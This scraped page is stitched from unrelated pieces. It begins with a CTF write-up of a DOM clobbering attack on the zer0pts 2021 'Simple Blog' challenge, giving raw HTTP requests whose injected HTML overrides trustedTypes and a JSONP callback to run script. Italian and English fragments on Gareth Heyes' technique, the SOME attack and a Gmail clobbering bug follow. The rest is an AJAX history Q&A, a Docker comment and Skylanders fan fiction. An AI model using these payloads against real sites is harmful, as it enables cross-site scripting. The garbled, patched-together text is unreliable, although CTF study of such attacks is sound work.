While the wiki covers different aspects of DOM Clobbering, new clobbering techniques and threats are always emerging. Improvements and suggestions, whether to add new content or expand existing documentation, are always more than appreciated. For more information, please refer to contribution guidelines.
Searching inside the frame.html source code, I found something interesting that reminded me an great article by Gareth Heyes about DOM Clobbering ( -clobbering-strikes-back) in this part of the frame.html JavaScript code:
DOM Clobbering strikes back
Simple Blog Simple Blog Report Vulnerability
Toggle theme
Loading... // JSONP const jsonp = (url, callback) => { const s = document.createElement('script');
// initialize blog const init = () => { // try to register trusted types try { trustedTypes.createPolicy('default', { createHTML(url) return url.replace(/[]/g, ''); , createScriptURL(url) { if (url.includes('callback')) throw new Error('custom callback is unimplemented');
You can pass a `callback` parameter to the [`api.php`]( -Writeups/master/zer0pts%20CTF%202021/Simple%20Blog/simple_blog/web/www/api.php) endpoint and the method will be reflected into the output. The length limit is 20 chars.
```GET /api.php?callback=foo HTTP/1.1Host: web.ctf.zer0pts.com:8003User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36Accept: */*Referer: :8003/Accept-Encoding: gzip, deflateAccept-Language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7Connection: close
The process works as follow:1. a [`trusted-types`]( -US/docs/Web/HTTP/Headers/Content-Security-Policy/trusted-types) policy is created;2. the `jsonp` method is invoked;3. the `jsonp` method calls [`api.php`]( -Writeups/master/zer0pts%20CTF%202021/Simple%20Blog/simple_blog/web/www/api.php) passing the content of `window.callback`, if specified;4. [`api.php`]( -Writeups/master/zer0pts%20CTF%202021/Simple%20Blog/simple_blog/web/www/api.php) returns a JavaScript snippet that will be included in the webpage and it will be executed, because it is considered "safe" for all defined policies;5. the default method that will be executed is the `render` one, that will print blog posts into the page.
This can be achieved with a technique called [*DOM clobbering*]( -security/dom-based/dom-clobbering). With this technique, the `window.callback` can be the reference to an HTML object with `id="callback"`, so a payload like the following can be used.
```GET /?theme=dark.min.css%22%3E%3Cdiv+id=%22callback%22%3Efoo%3C/div%3E%3C HTTP/1.1Host: web.ctf.zer0pts.com:8003Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7Connection: close
But this will trigger the error: `custom callback is unimplemented`. That happens because, in the CSP, there is the definition of `default` trusted type which is defined in the `init()` JavaScript function in the page.
The *DOM clobbering* technique can help you again. Here some references that can be useful to understand how it works:* [ -security/dom-based/dom-clobbering]( -security/dom-based/dom-clobbering)* [ -clobbering-strikes-back]( -clobbering-strikes-back)* [ @terjanq/dom-clobbering-techniques-8443547ebe94]( @terjanq/dom-clobbering-techniques-8443547ebe94)* [ @terjanq/clobbering-the-clobbered-vol-2-fb199ad7ec41]( @terjanq/clobbering-the-clobbered-vol-2-fb199ad7ec41)
The first step is to inject via *DOM clobbering* a `trustedType` object in order to override the one provided by the library. An exception will be thrown and the `catch` in the `init()` method will be reached. To bypass the `if` clause inside the `catch`, it is sufficient to use again the *DOM clobbering*, using a payload like the following.
```GET /api.php?callback=//%0Aalert(); HTTP/1.1Host: web.ctf.zer0pts.com:8003User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0Accept: */*Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateConnection: closeReferer: :8003/?theme=dark.min.css%22%3E%3Cform%20id=trustedTypes%3E%3Coutput%20id=defaultPolicy%3Etrue%3C/output%3E%3C/form%3E%3Ca%20id=callback%20href=//%250Aalert();%3E%3C/a%3E%3C%22
Ormai siamo abituati alla fantasia di Gareth Heyes nella scelta dei nomi delle tecniche per sfruttare vulnerabilità delle web application (vedi DOM-based dangling markup) fantasia che, nel 2013, si esprime nell'etichettare questa tecnica come clobbering (picchiare):
Tralasciando la creatività di Gareth per concentrarci sull'articolo che, qualche giorno fa, ha pubblicato sul blog di PortSwigger "DOM Clobbering strikes back". La tecnica sfrutta la possibilità di sovrascrivere una variable o un oggetto JavaScript con una HTMLCollection per modificare il comportamento dello script JavaScript per arrivare a un Cross-Site Scripting. Tutto ciò è molto utile se, come nel caso del Lab che risolveremo in questo post, l'injection HTML è sanitizzato per impedire l'exploit di vulnerabilità XSS. Facciamo un passo indietro.
Ps: Many of the things described in this article have already been introduced in the following link -14/materials/eu-14-Hayak-Same-Origin-Method-Execution-Exploiting-A-Callback-For-Same-Origin-Policy-Bypass-wp.pdf, anyway, I will make a brief explanation on some subjects again.
SOME Attack is an attack that was introduced in 2014, by researcher Ben Hayak. There is a great white paper written by him on the attack -14/materials/eu-14-Hayak-Same-Origin-Method-Execution-Exploiting-A-Callback-For-Same-Origin-Policy-Bypass-wp.pdf. The concept of the attack is cool but nowadays it is difficult to find scenarios where you can exploit it, however, they have already been found in the past.
And to use this technique in the attack is the DOM Clobbering of the title. The word clobbering was known for the first time because of this attack method. I checked it and found that it has the meaning of covering in the computer professional field, which is to cover something through the DOM to achieve an attack.
In 2019, there is a vulnerability in Gmail that was attacked through DOM clobbering. The complete analysis is here: XSS in GMail's AMP4Email via DOM Clobbering , the following briefly talks about the process (part of the content is taken from this article).
Alas, your question can't be answered, AJAX requests have nothing to do with browser history, and if you loaded some dynamic content with them, then the user clicked the browser back button, the previous page is loaded (this which was loaded with an ordinary GET or POST request), which corrupts the sequence you display content in.
Dmitri's answers means that you will maintain your own history for the dynamic content using the fragment part of the url (this after the # symbol), maybe you'll provide your own back and forward buttons, but still you're not protected from the effect of the browser back and forward buttons.
This is a great guide, keep it handy. I plan to go back and read it carefully, but it explains some things I've had to work around when configuring containers. For example, for two containers to share a volume I have to do stuff like this in both Dockerfiles: "useradd -r -U -u 1001 www" in order to get around some permission errors.
After reporting back to Master Eon at the Skylanders Academy about what happened to them, Spotlight and Blackout soon discovered through Gearshift's report that Pain-Yatta used their Light and Dark powers to create an army of candy warriors to rule Skylands. Upon learning about Pain-Yatta's plan, Master Eon sent Spotlight and Blackout back to the Arkeyan ruins in order to find out any clues about the attack. Once there, the two dragons were ambushed by a horde of candy warriors until Knight Light and Knight Mare came to assist their fellow Skylanders. However they were soon confronted by Pain-Yatta, who released a wave of candy upon the four Light and Dark Skylanders.
Skylanders: Spyro's AdventureGill Grunt - Slam Bam - Wham-Shell - ZapSkylanders: GiantsChill - ThumpbackSkylanders: Swap ForceFreeze Blade - Punk Shock - Rip Tide - Wash BucklerSkylanders: Trap TeamEcho - Flip Wreck - Lob-Star - Snap ShotSkylanders: SuperChargersDeep Dive Gill Grunt - Dive-ClopsSkylanders: ImaginatorsGrave Clobber - King Pen - TidepoolMinis / Eon's EliteGill Runt - Thumpling / Elite Gill Grunt - Elite Slam BamAlt DecosDark King Pen - Dark Snap Shot - Dark Wash Buckler - Instant Dive-ClopsInstant Snap Shot - Legendary Chill - Legendary Slam Bam - Missile-Tow Dive-ClopsNitro Freeze Blade - Winterfest Lob-StarLost Islands Alter EgosAdmiral Thumpback - Holiday Wash Buckler - Merry Snap Shot - Surfer Slam Bam 2ff7e9595c
Comments